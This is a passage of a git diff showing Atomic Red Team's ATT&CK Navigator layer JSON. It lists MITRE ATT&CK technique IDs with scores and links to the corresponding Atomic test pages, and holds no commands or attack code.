Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index e69de29b..84129699 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json 
@@ -0,0 +1 @@ +{"version":"4.3","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View 
